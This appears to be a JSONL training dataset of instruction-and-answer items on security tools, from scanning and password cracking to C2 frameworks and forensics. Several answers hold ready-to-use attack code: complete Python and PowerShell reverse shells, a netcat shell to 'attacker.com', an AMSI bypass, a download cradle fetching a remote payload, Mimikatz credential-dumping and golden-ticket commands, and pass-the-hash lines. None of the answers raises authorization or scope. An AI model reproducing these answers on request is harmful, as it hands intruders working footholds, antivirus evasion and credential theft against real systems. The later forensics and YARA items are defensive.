Files
RustAI_Full/output/cyber_tools.jsonl
T
frostyripper1 0ce755b495 master
2026-05-19 13:50:32 +02:00

45 lines
37 KiB
JSON

{"type": "instruction_following", "instruction": "How to use nmap for network scanning?", "input": "", "reasoning": "nmap is the standard network scanning tool in cybersecurity. Correct usage is essential for reconnaissance.", "output": "nmap - network scanning. Key commands: nmap -sV -sC <target> (version + default scripts), nmap -sS <target> (stealth SYN), nmap -O <target> (OS detection), nmap -p- <target> (all 65535 ports), nmap -sU -p <ports> <target> (UDP scan), nmap --script=vuln <target> (vuln scan), nmap -A <target> (aggressive all-in-one). Output: -oN (normal), -oX (XML), -oG (greppable). Timing: -T0 (paranoid) to -T5 (insane)."}
{"type": "instruction_following", "instruction": "How to use masscan for fast port scanning?", "input": "", "reasoning": "masscan is the fastest port scanner, capable of scanning the entire internet in minutes. Essential for large-scale recon.", "output": "masscan - high-speed port scanner. Key commands: masscan <target> -p<ports> --rate=<packets/sec> (scan at specified rate). masscan 10.0.0.0/8 -p80,443 --rate=1000 (class A scan). masscan <target> -p0-65535 --rate=10000 --output-format json -oJ scan.json. Must run as root on Linux. Exclude: --excludefile exclude.txt. Output formats: -oL (list), -oJ (JSON), -oB (binary). Typical rates: 100-100000 packets/sec."}
{"type": "instruction_following", "instruction": "How to use Metasploit for exploitation?", "input": "", "reasoning": "Metasploit is the most widely used exploitation framework. Understanding its usage is critical for penetration testing.", "output": "Metasploit (msfconsole) - exploitation framework. Commands: msfconsole (launch), search <exploit> (search), use <module> (select), show options (view params), set <PARAM> <value> (configure), run/exploit (execute), sessions -l (list active), sessions -i <id> (interact). Key modules: exploit/multi/handler (payload handler), exploit/windows/smb/ms17_010_eternalblue (EternalBlue), post/windows/gather/hashdump (hash extraction). Payloads: windows/x64/meterpreter/reverse_tcp, linux/x64/shell/reverse_tcp."}
{"type": "instruction_following", "instruction": "How to use BloodHound for Active Directory enumeration?", "input": "", "reasoning": "BloodHound maps Active Directory attack paths using graph theory. Essential for AD security assessments.", "output": "BloodHound - AD attack path mapper. Steps: 1) Run SharpHound on target: SharpHound.exe -c All --zipfilename output. 2) Collect rights, group memberships, ACLs, sessions. 3) Load ZIP into BloodHound UI (neo4j backend). 4) Use queries: Find all Domain Admins, Shortest Paths to Domain Admins, Find Computers with Unconstrained Delegation. Key edges: MemberOf, AdminTo, HasSession, CanRDP, ForceChangePassword, GenericAll, DCSync. Install: neo4j console, then BloodHound --no-sandbox."}
{"type": "instruction_following", "instruction": "How to use Mimikatz for credential dumping?", "input": "", "reasoning": "Mimikatz extracts credentials from Windows systems. It is the standard tool for post-exploitation credential access.", "output": "Mimikatz - Windows credential extraction. Key commands (run as admin): privilege::debug (enable debug), sekurlsa::logonpasswords (dump passwords from LSASS), lsadump::sam (dump SAM), lsadump::lsa /patch (dump LSA secrets), lsadump::dcsync /user:krbtgt (DCSync attack), kerberos::golden /user:admin /domain:DOMAIN /sid:S-1-... /krbtgt:HASH /ptt (golden ticket). vault::cred /list (Windows credentials). sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH (pass-the-hash)."}
{"type": "instruction_following", "instruction": "How to use Hashcat for password cracking?", "input": "", "reasoning": "Hashcat is the fastest password recovery tool using GPU acceleration. Required for password auditing.", "output": "Hashcat - GPU-accelerated password cracking. Commands: hashcat -m <mode> -a <attack> hash.txt wordlist.txt. Modes: 1000 (NTLM), 100 (SHA1), 13100 (Kerberos TGS), 5600 (NetNTLMv2), 2100 (Domain Cached Creds), 18200 (AS-REP), 7500 (Bitcoin). Attacks: -a 0 (wordlist), -a 3 (mask/brute), -a 6 (wordlist+mask), -a 7 (mask+wordlist). Mask: ?l (lower), ?u (upper), ?d (digit), ?s (special), ?a (all). Rule-based: -r rule.rule. Optimize: -O (optimized), --force, -w 4 (high workload)."}
{"type": "instruction_following", "instruction": "How to use John the Ripper for password cracking?", "input": "", "reasoning": "John the Ripper is a classic password cracker for various hash types. Useful alongside Hashcat for CPU-based attacks.", "output": "John the Ripper - CPU password cracker. Commands: john hash.txt (auto-detect hash). john --format=nt hash.txt (force NTLM). john --wordlist=wordlist.txt hash.txt (wordlist). john --rules hash.txt (with mangling rules). john --show hash.txt (show cracked). john --incremental hash.txt (brute force). unshadow passwd shadow > combined.txt (combine Linux creds). Common formats: nt (NTLM), raw-sha1, krb5tgs, bcrypt, descrypt, md5crypt."}
{"type": "instruction_following", "instruction": "How to use Wireshark/tshark for packet analysis?", "input": "", "reasoning": "Wireshark is the standard packet analyzer. tshark is its CLI version. Required for network forensics and traffic analysis.", "output": "Wireshark/tshark - packet analysis. tshark commands: tshark -r capture.pcap (read file), tshark -r capture.pcap -Y 'http.request' (filter HTTP), tshark -r capture.pcap -T fields -e ip.src -e ip.dst (extract IPs). Display filters: tcp.port==443, ip.addr==10.0.0.1, dns.qry.name contains example.com, http.request.method==POST, tls.handshake.type==1 (Client Hello). Capture filters: port 80, host 10.0.0.1, not arp. Follow: HTTP, TCP, UDP streams via right-click. Statistics: Protocol Hierarchy, Conversations, Endpoints."}
{"type": "instruction_following", "instruction": "How to use sqlmap for SQL injection?", "input": "", "reasoning": "sqlmap automates SQL injection detection and exploitation. Critical for web application security testing.", "output": "sqlmap - SQL injection automation. Commands: sqlmap -u 'http://target.com/page?id=1' (basic test). sqlmap -u 'http://target.com/page?id=1' --dbs (enumerate databases). sqlmap -u 'http://target.com/page?id=1' -D dbname --tables (list tables). sqlmap -u 'http://target.com/page?id=1' -D dbname -T users --dump (dump data). sqlmap -r request.txt (from raw HTTP request). sqlmap -u 'http://target.com/page?id=1' --os-shell (OS shell). sqlmap -u 'http://target.com/page?id=1' --batch --random-agent (stealth). Risk/level: --level 3 --risk 2 (deeper testing)."}
{"type": "instruction_following", "instruction": "How to use Gobuster/ffuf for web fuzzing?", "input": "", "reasoning": "Gobuster and ffuf are essential for directory/file discovery and web fuzzing during web application assessments.", "output": "Gobuster + ffuf - web fuzzing tools. Gobuster: gobuster dir -u http://target.com -w wordlist.txt (directory brute), gobuster dns -d target.com -w subdomains.txt (subdomain), gobuster vhost -u http://target.com -w hosts.txt (vhost). ffuf: ffuf -u http://target.com/FUZZ -w wordlist.txt (directory), ffuf -u http://target.com/page?param=FUZZ -w params.txt (parameter), ffuf -u http://target.com/FUZZ -w wordlist.txt -fc 403 (filter status). ffuf -u http://target.com/FUZZ -H 'Host: FUZZ.target.com' -w hosts.txt (vhost fuzz). Extensions: -x .php,.asp,.aspx,.jsp."}
{"type": "instruction_following", "instruction": "How to use Hydra/Medusa for brute force attacks?", "input": "", "reasoning": "Hydra and Medusa are network authentication brute forcers. Used for testing password strength across services.", "output": "Hydra - network login brute forcer. Commands: hydra -l admin -P pass.txt ssh://192.168.1.1 (SSH), hydra -L users.txt -P pass.txt rdp://target (RDP), hydra -l admin -P pass.txt smb://target (SMB), hydra -l admin -P pass.txt ftp://target (FTP), hydra -L emails.txt -P pass.txt smtp://target (SMTP), hydra -l admin -P pass.txt http-post-form '/login:user=^USER^&pass=^PASS^:F=incorrect' (web form). -t <threads> (parallel tasks), -vV (verbose). Output: -o results.txt. Medusa has similar syntax with -M <module> -h <host> -U users -P passwords."}
{"type": "instruction_following", "instruction": "How to use Impacket tools for Windows protocol attacks?", "input": "", "reasoning": "Impacket is a collection of Python tools for SMB, Kerberos, MSRPC, and other Windows protocols. Essential for Active Directory attacks.", "output": "Impacket - Python Windows protocol tools. Key scripts: impacket-secretsdump DOMAIN/user:pass@target (DCSync/dump hashes). impacket-psexec DOMAIN/user:pass@target (remote execution via SMB). impacket-wmiexec DOMAIN/user:pass@target (WMI execution). impacket-smbexec DOMAIN/user:pass@target (SMB exec without touching disk). impacket-GetUserSPNs DOMAIN/user:pass -request (Kerberoast). impacket-GetNPUsers DOMAIN/ -request -no-pass (AS-REP roast). impacket-ticketer -nthash HASH -domain DOMAIN -user admin (golden ticket). impacket-rpcdump target (RPC endpoint mapper)."}
{"type": "instruction_following", "instruction": "How to use Responder for LLMNR/NBT-NS poisoning?", "input": "", "reasoning": "Responder poisons LLMNR, NBT-NS, and MDNS name resolution in Windows networks. Used for credential capture in internal tests.", "output": "Responder - name resolution poisoning. Usage: sudo responder -I eth0 (poison all protocols on interface). sudo responder -I eth0 -w (enable WPAD). sudo responder -I eth0 -r (enable MySQL auth capture). sudo responder -I eth0 -v (verbose). Captured: SMBv2 NTLMv2 hashes, HTTP basic auth, Kerberos tickets in logs/SMB-*.txt. Analysis with: john or hashcat -m 5600 captured_hash.txt. Cleanup after test. Off: -A (analyze mode, no poisoning). Combine with ntlmrelayx for relay attacks."}
{"type": "instruction_following", "instruction": "How to use Ligolo-ng for network tunneling?", "input": "", "reasoning": "Ligolo-ng creates encrypted tunnels through firewalls. Essential for pivoting through segmented networks during assessments.", "output": "Ligolo-ng - lightweight tunneling/pivoting. Setup: 1) Start proxy on attacker: ligolo-proxy -selfcert -laddr 0.0.0.0:443. 2) Deploy agent on target: ligolo-agent -connect attacker.com:443 -ignore-cert. 3) In proxy: session (list), session <id> (select), ifconfig (see routes), listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:8080 (forward port). Routing: ip link set ligolo up, ip route add 10.10.0.0/24 dev ligolo (add routes). Windows agent: ligolo-windows-amd64.exe -connect attacker.com:443 -ignore-cert."}
{"type": "instruction_following", "instruction": "How to use Chisel for fast TCP/UDP tunneling?", "input": "", "reasoning": "Chisel creates HTTP/SSH tunnels through firewalls using a single binary. Quick alternative to Ligolo for simple pivoting.", "output": "Chisel - fast TCP/UDP tunnel over HTTP. Server (attacker): chisel server -p 8000 --reverse. Client (target): chisel client attacker.com:8000 R:8001:localhost:80 (forward port 8001 to target's port 80). chisel client attacker.com:8000 R:socks (SOCKS5 proxy on server). chisel client attacker.com:8000 R:0.0.0.0:8443:10.10.0.1:443 (pivot to internal host). One binary for all platforms. Use --fingerprint for mutual auth. Add --keepalive to maintain connection. Windows: chisel.exe client attacker.com:8000 R:socks."}
{"type": "instruction_following", "instruction": "How to use Netcat for networking and reverse shells?", "input": "", "reasoning": "Netcat is the Swiss Army knife of networking. Used for reverse shells, port scanning, file transfer, and debugging.", "output": "Netcat/ncat - networking utility. Reverse shell listener: nc -lvnp 4444 (listen), nc -e /bin/sh attacker.com 4444 (Linux send), ncat.exe -e cmd.exe attacker.com 4444 (Windows). Port scan: nc -zv target 1-1000 (TCP scan), nc -zvu target 53 (UDP). File transfer: nc -lvp 4444 > file (receive), nc attacker.com 4444 < file (send). Banner grab: echo 'GET / HTTP/1.0\r\n' | nc target.com 80. Chat: nc -lvp 4444 (host), nc host.com 4444 (connect). Bind shell: nc -lvnp 4444 -e /bin/sh."}
{"type": "instruction_following", "instruction": "How to use PowerShell for cybersecurity tasks?", "input": "", "reasoning": "PowerShell is essential for Windows-based cybersecurity operations, both offensive and defensive. It is the primary scripting language on Windows.", "output": "PowerShell - Windows scripting for security. Key cmdlets: Get-Process (list processes), Get-Service (services), Get-WmiObject Win32_ComputerSystem (system info), Get-WmiObject Win32_UserAccount (user accounts). Remote: Invoke-Command -ComputerName target -ScriptBlock {cmd} (remote exec), Enter-PSSession target (interactive). AMSI bypass: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true). Execution: powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <base64>. Download cradle: IEX (New-Object Net.WebClient).DownloadString('http://host/payload.ps1')."}
{"type": "instruction_following", "instruction": "How to use Python for cybersecurity scripting?", "input": "", "reasoning": "Python is the most widely used language for cybersecurity tools and scripting. Essential for custom exploit development, automation, and tooling.", "output": "Python - security scripting. Key libraries: requests (HTTP), socket (networking), scapy (packet manipulation), paramiko (SSH), impacket (Windows protocols), cryptography, pycryptodome (crypto), pywinrm (WinRM), dnspython (DNS). Common patterns: import requests; r = requests.get('http://target.com', headers={'User-Agent': 'Mozilla/5.0'}). Socket: s.connect(('host', port)); s.send(data); s.recv(1024). Subprocess: import subprocess; result = subprocess.run(['nmap','-sV','target'], capture_output=True, text=True). Threading for parallel tasks. Argument parsing with argparse. JSON handling with json module."}
{"type": "instruction_following", "instruction": "How to use curl for HTTP requests in cybersecurity?", "input": "", "reasoning": "curl is the standard command-line HTTP client. Used extensively for web application testing, API interaction, and payload delivery.", "output": "curl - HTTP client for testing. Commands: curl -v http://target.com (verbose). curl -k https://target.com (ignore TLS errors). curl -X POST -d 'data=value' http://target.com (POST). curl -b 'session=abc' -c cookies.txt http://target.com (cookies). curl -H 'Authorization: Bearer TOKEN' http://target.com/api (auth header). curl -A 'Mozilla/5.0' -e http://referrer.com http://target.com (spoof user-agent + referer). curl -o output.html -s -S http://target.com (save output, silent). curl --proxy http://proxy:8080 http://target.com (via proxy). curl --path-as-is -u admin:admin http://target.com (basic auth)."}
{"type": "instruction_following", "instruction": "How to perform pass-the-hash attacks?", "input": "", "reasoning": "Pass-the-Hash uses NTLM hash instead of plaintext password for authentication. Critically important for lateral movement in Windows domains.", "output": "Pass-the-Hash - authenticate with NTLM hash. Tools: impacket-psexec DOMAIN/admin@target -hashes LMHASH:NTHASH (psexec). impacket-wmiexec DOMAIN/admin@target -hashes LMHASH:NTHASH (WMI). impacket-smbexec same syntax (SMB). Mimikatz: sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH (creates process with hash). CrackMapExec: crackmapexec smb target -u admin -H NTHASH -x 'whoami' (remote exec). Evil-WinRM: evil-winrm -i target -u admin -H NTHASH (WinRM shell). Native: winexe -U DOMAIN/admin%HASH //target cmd.exe."}
{"type": "instruction_following", "instruction": "How to use CrackMapExec (CME) for network assessment?", "input": "", "reasoning": "CrackMapExec automates assessment of Windows networks using multiple protocols. Essential for lateral movement and privilege escalation.", "output": "CrackMapExec (CME) - Windows network assessment. Commands: crackmapexec smb target -u users.txt -p pass.txt (password spray). crackmapexec smb target -u admin -H NTHASH --local-auth (pass-the-hash). crackmapexec smb target -u admin -H NTHASH -x whoami (remote exec). crackmapexec smb target --sessions (logged-in users). crackmapexec smb target --shares (list shares). crackmapexec smb target --sam (dump SAM). crackmapexec smb target --lsa (dump LSA). crackmapexec smb target --dpapi (DPAPI secrets). crackmapexec smb target -M mimikatz -o COMMAND='sekurlsa::logonpasswords' (run module). Modules in ~/.cme/modules/. Logs in ~/.cme/logs/."}
{"type": "instruction_following", "instruction": "How to perform Kerberoasting attacks?", "input": "", "reasoning": "Kerberoasting extracts service account TGS tickets for offline cracking. One of the most common AD attack techniques.", "output": "Kerberoasting - get TGS tickets for service accounts. impacket-GetUserSPNs DOMAIN/user:pass -outputfile hashes.txt (request+save). impacket-GetUserSPNs DOMAIN/user:pass -request (or just request). Windows (PowerShell): Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/target.domain.com' (request SPN ticket). klist (view tickets). mimikatz: kerberos::ask /target:HTTP/target.domain.com (request ticket). Crack with: hashcat -m 13100 hashes.txt wordlist.txt (Kerberos TGS-REP). john hashes.txt --format=krb5tgs. Mitigation: managed service accounts (gMSA), strong (>25 char) random passwords for service accounts."}
{"type": "instruction_following", "instruction": "How to perform AS-REP roasting attacks?", "input": "", "reasoning": "AS-REP roasting targets accounts without Kerberos pre-authentication. A stealthy way to get crackable hashes in AD.", "output": "AS-REP roasting - target accounts with 'Do not require Kerberos preauth' flag. impacket-GetNPUsers DOMAIN/ -usersfile users.txt -request -dc-ip DC_IP (request AS-REP for list). impacket-GetNPUsers DOMAIN/user:pass -request (if you have creds for one user, find others). Windows (PowerShell with Rubeus): Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt. Crack with: hashcat -m 18200 hashes.txt wordlist.txt (AS-REP hashcat mode). john hashes.txt --format=krb5asrep. Enumerate: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth (PowerShell AD module)."}
{"type": "instruction_following", "instruction": "How to use Evil-WinRM for Windows remote management?", "input": "", "reasoning": "Evil-WinRM provides interactive Windows remote shell with built-in security tools. Preferred for WinRM-based lateral movement.", "output": "Evil-WinRM - Windows remote shell via WinRM. Commands: evil-winrm -i target -u admin -p password (password auth). evil-winrm -i target -u admin -H NTHASH (pass-the-hash). evil-winrm -i target -u admin -p password -s scripts/ (load scripts folder). evil-winrm -i target -u admin -p password -e binaries/ (upload binaries). Features: Bypass 4MSI (automatically AMSI bypass). `menu` shows options (DLL load, Invoke-Binary, upload/download). PowerShell scripts loadable with -s flag. Upload files: upload local.txt C:\remote.txt. Download: download C:\remote.txt local.txt."}
{"type": "instruction_following", "instruction": "How to use ysoserial for Java deserialization attacks?", "input": "", "reasoning": "ysoserial generates Java deserialization payloads. Essential for exploiting insecure deserialization in Java applications.", "output": "ysoserial - Java deserialization payload generator. Commands: java -jar ysoserial.jar CommonsCollections1 'cmd /c whoami' (generate payload). java -jar ysoserial.jar JRMPClient 'attacker:1099' (RMI client). java -jar ysoserial.jar URLDNS 'http://burpcollab.net' (verify deserialization). Common gadgets: CommonsCollections1-7, CommonsBeanutils1, Jdk7u21, JRMPClient/Server, Groovy1, Spring1, Hibernate1-2. Use ysoserial.net for .NET applications. Detection: SerialKiller, Contrast, gadget-probe. Mitigation: upgrade libraries, use deserialization whitelist, non-default ObjectInputStream."}
{"type": "instruction_following", "instruction": "How to use Empire/Starkiller for post-exploitation?", "input": "", "reasoning": "Empire is a PowerShell/ Python post-exploitation framework with Starliner UI. Used for C2 operations after initial access.", "output": "Empire + Starkiller - post-exploitation C2. Empire server: sudo powershell-empire server (start server). Client: sudo powershell-empire client (CLI access). Starkiller web UI: connect to https://localhost:1337 (graphical interface). Key commands: listeners (list), uselistener http (HTTP listener), set Host http://attacker.com, set Port 8080, execute. usestager windows/launcher_bat (generate stager), set Listener http, execute. agents (list active), interact AGENT_ID (enter agent), shell whoami (run OS command). Modules: usemodule credentials/mimikatz/logonpasswords, usemodule situational_awareness/host/computerdetails."}
{"type": "instruction_following", "instruction": "How to use Sliver C2 for command and control?", "input": "", "reasoning": "Sliver is a modern C2 framework by Bishop Fox. Supports HTTP/S, DNS, mTLS, WireGuard for implant communication.", "output": "Sliver C2 - implant framework. Server: sliver-server (start). Client: sliver-client (connect). Profiles: new-profile --mtls attacker.com --http attacker.com --name win64 --arch amd64 --format exe --os windows. Generate: generate --profile win64 --save /tmp/implant.exe (generate implant). generate --http http://attacker.com:80 --save beacon.exe (single-protocol). Listeners: mtls --lhost 0.0.0.0 --lport 443, http --lhost 0.0.0.0 --lport 80. When implant calls back: use IMPLANT_ID, info (show details). Commands: shell (interactive), ps, ls, cd, upload/download, screenshot, sideload (execute DLL), execute-shellcode (run shellcode), socks5 (SOCKS proxy), pivot listener (pivot listener)."}
{"type": "instruction_following", "instruction": "How to use Mythic C2 for command and control?", "input": "", "reasoning": "Mythic is an open-source C2 framework with multiple agent types. Supports cross-platform operations with extensive plugin system.", "output": "Mythic C2 - multi-agent C2 framework. Deploy: docker-compose up (start Mythic services). Web UI at https://localhost:7443. Agents: apollo (Windows .NET), poseidon (macOS), thanatos (Python cross-platform), atlas (Rust cross-platform). Creating callback: generate payload in UI. Commands per agent (e.g., poseidon): shell (OS command), download/upload, ls, cp, mv, ps, kill, socks (SOCKS proxy), portscan (TCP scanner), screencapture, keylog (keylogging). Plugin marketplace for community agents. Task chaining, browser script automation for multi-step tasks. HTTP/S, DNS, SMB, and TCP C2 profiles."}
{"type": "instruction_following", "instruction": "How to use Havoc C2 for command and control?", "input": "", "reasoning": "Havoc is a modern C2 framework with a Demon agent. Features sleep obfuscation, indirect syscalls, and ETW/AMSI bypass.", "output": "Havoc C2 - modern C2 with Demon agent. Server: sudo ./havoc server --profile ./profiles/havoc.yaotl (start server). Client: ./havoc client (GUI client). Payload config: create Listener (HTTP/S, SMB, Pivot, External), configure Host, Port, User-Agent, Headers. Generate payload: choose architecture (x64/x86), format (EXE/DLL/Shellcode), techniques. Features: sleep obfuscation (Ekko, Foliage), indirect syscalls (Hell's Gate, Halo's Gate), ETW patching, AMSI bypass, NTDLL unhooking. Callbacks: command output, file browser, screenshots, token manipulation, SOCKS proxy. Extensibility: Python plugins, custom agent support."}
{"type": "instruction_following", "instruction": "How to build a reverse shell in Python?", "input": "", "reasoning": "Python reverse shells are commonly used in assessments for fire-and-forget remote access.", "output": "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn('/bin/sh') [Linux reverse shell]. For Windows: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);while True: buf=s.recv(1024).decode(); if buf.lower()=='exit\\n': break; o=subprocess.check_output(buf,shell=True,stderr=subprocess.STDOUT); s.send(o). Encoded: python3 -c 'EXEC'."}
{"type": "instruction_following", "instruction": "How to build a reverse shell in PowerShell?", "input": "", "reasoning": "PowerShell reverse shells are needed for Windows targets where other tools are restricted.", "output": "PowerShell reverse shell: $client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close(). One-liner: powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <base64-encoded-command>. Use Invoke-PowerShellTcp.ps1 from Nishang for advanced features (persistence, download, upload)."}
{"type": "instruction_following", "instruction": "How to perform network enumeration with Windows CMD?", "input": "", "reasoning": "Windows CMD built-in tools are often the only option on locked-down systems. Essential knowledge for low-privilege enumeration.", "output": "Windows CMD enumeration commands: systeminfo (OS/patches), whoami /all (user + privileges), net user (list users), net user USERNAME (user details), net localgroup (groups), net localgroup Administrators (admin group), net group /domain (domain groups), net group 'Domain Admins' /domain (domain admins), net share (shares), net use (mounted drives), ipconfig /all (network config), route print (routing table), arp -a (ARP cache), nslookup TARGET (DNS), netstat -ano (active connections + PIDs), tasklist /v (processes with owners), wmic product list brief (installed software), reg query (registry query), dir /s *.config (find config files)."}
{"type": "instruction_following", "instruction": "How to use Bash for Linux cybersecurity scripting?", "input": "", "reasoning": "Bash is the primary shell on Linux. Essential for enumeration, automation, and post-exploitation scripting.", "output": "Bash - Linux security scripting. Enumeration: uname -a (kernel), cat /etc/os-release (distro), id (current user), sudo -l (sudo privileges), cat /etc/passwd (users), cat /etc/shadow (hashes - need root), ps aux (processes), ss -tlnp (listening ports), netstat -tulpn (listening), find / -perm -4000 -type f (SUID binaries), find / -writable -type f 2>/dev/null (writable files), crontab -l (cron jobs), ls -la /etc/cron* (system cron), env (environment variables), cat ~/.bash_history (command history), mount (mounted filesystems), df -h (disk usage), ldd /bin/app (shared libraries). One-liners: for ip in $(seq 1 254); do ping -c 1 10.0.0.$ip | grep 'bytes from' & done (ping sweep)."}
{"type": "instruction_following", "instruction": "How to use searchsploit/Exploit-DB for exploit research?", "input": "", "reasoning": "Searchsploit provides local access to the Exploit-DB database. Required for finding public exploits for identified vulnerabilities.", "output": "Searchsploit - Exploit-DB search tool. Commands: searchsploit <term> (search exploit database). searchsploit -t <title> (search title only). searchsploit apache 2.4.49 (specific version). searchsploit -m <EDB-ID> (mirror exploit to cwd). searchsploit -x <EDB-ID> (view exploit contents). searchsploit -o (online mode for updates). searchsploit -u (update database). searchsploit --cve CVE-2021-41773 (search by CVE). Categories: remote, local, webapps, dos, shellcode. Export: searchsploit -t <term> -j (JSON output for scripting). Path: /usr/share/exploitdb/exploits/. Update with: sudo searchsploit -u."}
{"type": "instruction_following", "instruction": "How to use Ghidra for reverse engineering?", "input": "", "reasoning": "Ghidra is the NSA's reverse engineering framework. Essential for malware analysis and binary vulnerability research.", "output": "Ghidra - reverse engineering framework. Installation: requires JDK 17+, download from ghidra-sre.org. Create project: File > New Project > Non-Shared. Import binary: File > Import File (select PE/ELF/Mach-O). Analysis: auto-analyze (x86, ARM, MIPS). Key features: Decompiler (Window > Decompiler), Listing (disassembly view), Symbol Tree (functions, labels), Program Trees (sections), Data Type Manager (structs/reconstruction). Navigation: function graph (right-click > Graph), search > Memory / Program Text, call tree. Scripting: Python 3 (Jython) and Java scripts via Script Manager. Scripts: SymbolicPropagation, StackAnalyzer, PDB. Use Ghidra plugins + extensions for enhanced analysis."}
{"type": "instruction_following", "instruction": "How to use x64dbg for Windows debugging?", "input": "", "reasoning": "x64dbg is the modern debugger for Windows binary analysis. Required for dynamic analysis of malware and exploits.", "output": "x64dbg - Windows debugger. Open: x64dbg.exe (x64), x32dbg.exe (x86). Key commands: F2 (breakpoint), F7 (step into), F8 (step over), F9 (run), Ctrl+F2 (restart), Ctrl+G (go to address). Breakpoints: Set on API calls (bp CreateFileW), conditional (right-click > Conditional Breakpoint). Memory map: View > Memory Map. Symbols: View > Symbols. Patches: Right-click > Assemble (modify instructions). Plugins: ScyllaHide (anti-debugging bypass), xAnalyzer (analysis), OllyDump (dump process), TitanHide (kernel-mode hiding). Scripting: x64dbgpy (Python plugin), x64_dotnet (managed code debugging). Export memory regions: right-click memory map > Dump (dump to file)."}
{"type": "instruction_following", "instruction": "How to use dnSpy for .NET decompilation?", "input": "", "reasoning": "dnSpy is the standard .NET decompiler and debugger. Essential for analyzing .NET malware and applications.", "output": "dnSpy - .NET decompiler/debugger. Open file: File > Open (drag-drop .exe/.dll/.winmd). Features: decompile to C# (full source reconstruction), edit assembly (right-click method > Edit Method, then compile). Debug: F5 (start debugging), set breakpoints (F9), step through (F10/F11). Search: Ctrl+Shift+K (search by string/class/method across assemblies). Analyzer: select method > Analyze (shows callers/callees/references). Export: File > Save Module (patched assembly to disk). BAML decompiler (WPF XAML). Hex view for raw IL. Use de4dot before dnSpy on obfuscated assemblies to deobfuscate. Supports .NET Core, .NET 5+ assemblies."}
{"type": "instruction_following", "instruction": "How to use Process Monitor (ProcMon) for Windows forensics?", "input": "", "reasoning": "ProcMon from Sysinternals monitors file system, registry, process/thread activity in real-time. Essential for behavioral malware analysis.", "output": "Process Monitor (ProcMon) - Windows activity monitor. Default filters: Include operations (RegSetValue, CreateFile, WriteFile, Process Create). Filter by: Process Name (include/exclude), Operation (RegOpenKey, CreateFile), Path (specific file/reg path), Result (SUCCESS, ACCESS DENIED). Key columns: Time, Process Name, PID, Operation, Path, Result, Detail. Focus on: CreateFile (file writes), WriteFile (data exfiltration), RegSetValue (persistence), Process Create (process injection), TCP/UDP Send/Recv (network). Boot logging: Enable Boot Logging in Options > Enable Boot Logging. Use Procmon.exe /BackingFile log.pml /Quiet /AcceptEula for command-line capture. Process Monitor Filter DLL for advanced regex filtering."}
{"type": "instruction_following", "instruction": "How to use Sysinternals tools for system analysis?", "input": "", "reasoning": "Sysinternals suite provides deep Windows system analysis tools. Indispensable for forensic investigation and privilege escalation.", "output": "Sysinternals - Windows system tools. Key tools: Process Explorer (procexp.exe) - detailed process tree, DLL listing, handle view. Process Monitor (procmon.exe) - real-time file/registry/process monitoring. PsExec (psexec.exe) - remote execution (psexec \\\\target -u user -p pass cmd). AccessChk (accesschk.exe) - check user permissions (accesschk64 -uwdqs Users c:\\windows). Autoruns (autoruns64.exe) - all startup locations, services, drivers, scheduled tasks. Strings (strings64.exe) - extract strings from binaries. TCPView (tcpview64.exe) - TCP/UDP endpoint monitoring. Handle (handle64.exe) - open file handles by process. Sigcheck (sigcheck64.exe) - file version/signing info. All available from Microsoft Sysinternals site."}
{"type": "instruction_following", "instruction": "How to use YARA for malware detection?", "input": "", "reasoning": "YARA creates pattern-based rules for malware classification. Essential for threat hunting and malware family identification.", "output": "YARA - pattern matching for malware. Rule syntax: rule RuleName { meta: description = 'description' strings: $text = 'malicious string' ascii wide nocase $hex = { 90 90 90 ?? E9 } condition: $text or $hex }. Scan: yara rule.yar target.exe (scan single file). yara -r rule.yar C:\\Windows\\System32 (recursive scan directory). yara -s rule.yar file.exe (print matching strings). yara -m rule.yar file.exe (print metadata). Modules: pe (PE files), elf (ELF), math (math functions), magic (file magic), cuckoo (Cuckoo sandbox). Includes: include 'other.yar'. Performance: compile rules with yarac for faster scans. Use with jYARA in Python: pip install yara-python, import yara, rules = yara.compile('rule.yar'), matches = rules.match('file.exe')."}
{"type": "instruction_following", "instruction": "How to use Volatility 3 for memory forensics?", "input": "", "reasoning": "Volatility analyzes RAM dumps for artifacts of compromise. Essential for forensic investigation of live systems and malware.", "output": "Volatility 3 - memory forensics. Install: pip install volatility3. Memory dump acquisition: winpmem (Windows), dumpit (Magnet), liME (Linux). Analysis: vol -f memory.dmp windows.info (OS/version info). vol -f memory.dmp windows.pslist (process list). vol -f memory.dmp windows.psscan (process scan with hidden). vol -f memory.dmp windows.pstree (process tree). vol -f memory.dmp windows.netscan (network connections). vol -f memory.dmp windows.cmdline (command lines). vol -f memory.dmp windows.filescan (open file handles). vol -f memory.dmp windows.dumpfiles --pid 1234 (dump process memory). vol -f memory.dmp windows.malfind (injections/PE). vol -f memory.dmp windows.registry.hivelist (registry hives). vol -f memory.dmp windows.hashdump (SAM hashes). Output: -o output_dir."}
